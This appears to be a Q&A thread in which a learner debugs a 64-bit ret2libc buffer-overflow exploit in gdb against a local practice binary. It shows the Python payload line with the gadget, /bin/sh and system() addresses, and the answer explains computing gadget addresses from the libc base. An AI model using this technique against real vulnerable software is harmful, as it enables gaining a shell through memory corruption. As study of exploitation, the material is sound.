# gdb reads wrong input(stdin) values

Tags: python, c, input, gdb, exploit

I input the following in gdb for ret2libc.

```
(gdb) r < <(python -c 'print("\x41"*10 + "\x42"*8 + "\xde\x67\x02\x00\x00\x00\x00\x00" + "\xac\xb1\xf7\f7\xff\x7f\x00\x00" + "\xa0\x08\xe4\xf7\xff\x7f\x00\x00")')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/kali/Desktop/c_system/a < <(python -c 'print("\x41"*10 + "\x42"*8 + "\xde\x67\x02\x00\x00\x00\x00\x00" + "\xac\xb1\xf7\f7\xff\x7f\x00\x00" + "\xa0\x08\xe4\xf7\xff\x7f\x00\x00")')
```

While i checked the memory it displayed wrong values after `0x267de`

```
(gdb) x/4g $rbp
0x7fffffffe190: 0x4242424242424242      0x00000000000267de
0x7fffffffe1a0: 0x007fff370cf7b1ac      0x007ffff7e408a000
```

All the addresses are correct and finally the program ended in segmentation fault.

```
AAAAAAAAAABBBBBBBB�g


Program received signal SIGSEGV, Segmentation fault.
0x00000000000267de in ?? ()
```

The gadget chosen was `pop rdi;ret` which is at `0x267de` ,`/bin/sh` is at `0x7ffff7f7b1ac` and `system()` is at `0x7ffff7e408a0` gets() was used to input the buffer which is 10 bytes long and no other variables are present in the source code.

Why wrong values are displayed?

Comment: I just don't understand this question at all.

Comment: The values given as input and the value of /bin/sh and system() are not same in the stack. Why is it so?

Comment: Python and C are not obliged to arrange things on the stack the way you think they ought to be arranged.  Those are *implementation details.*

Comment: But this input method worked fine for ret2lic on 32-bit machine. Does 64-bit machine make any difference?

Comment: It certainly could.

Comment: But it worked fine even in 64-bit machine while performing bufferoverflow attack and this is the first time I'm facing this issue

Comment: The black hat sites will probably have better luck helping you with this issue.

Comment: I tried the same input with perl just now and still the exact issue occurs. Any idea?

Comment: 0x267de may be the offset of the instructions of interest from the beginning of a segment in an object file, but after relocation they're going to be at a much higher address in the process. Try running the `disassemble` command in gdb to see what's there. It might be unmapped memory on 64-bit systems. I think the executable segments start at 0x40000.

Comment: `disass 0x267de` prints `No function contains specified address`.

Comment: 64 bit architectures generally have different ABI's than 32 architectures, but I think I would expect a string of characters to appear the same on both, though how they are passed/stored may differ.

Comment: @Mark Plotnick I resoved the address display issue by adding the offset with base address but after resolving it segfault occurs at `0x000000000000`. Why does it happen?

Comment: @Kingslayer Glad you found a solution. If you could, please post an answer to your question listing the steps you took to find the base addresses of the section and segment with the gadget, etc., to help other people who run into the same problem. I'm not sure how 6 bytes of zeroes can get on the stack, given your input strings. Can you ask that as a new question?. Include the C and assembly code of the program you're debugging.

Comment: @Mark Plotnick I have posted a new question for segfault

Answer (score 0, accepted):

As @Mark Plotnick said `0x267de` was the offset of the gadget `pop rdi; ret`. So in order to find the correct address of the gadget, the offset must be added with the base address. I used radare2 to find the gadget loading the path of libc as binary path. This implies that base address of libc is the base address of the gadget. To find the base address of libc I used `info proc map` in gdb. Also there are other ways to find the base address of libc. And when this address was used the address display issue was resolved